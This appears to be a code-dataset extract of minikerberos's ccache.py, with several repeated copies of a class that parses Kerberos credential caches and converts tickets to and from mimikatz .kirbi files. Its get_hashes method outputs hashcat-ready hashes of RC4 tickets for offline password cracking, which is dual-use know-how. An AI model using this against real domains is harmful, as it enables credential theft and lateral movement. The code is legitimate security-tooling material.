def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_all_tgt | python | def get_all_tgt(self):
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L566-L576 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_hashes | python | def get_hashes(self, all_hashes = False):
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L578-L590 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.from_kirbidir | python | def from_kirbidir(directory_path):
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L638-L650 | [
"def add_kirbi(self, krbcred, override_pp = True, include_expired = False):\n\tc = Credential()\n\tenc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native\n\tticket_info = enc_credinfo['ticket-info'][0]\n\n\t\"\"\"\n\tif ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):\n\t\tif... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_kirbidir | python | def to_kirbidir(self, directory_path):
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L652-L665 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
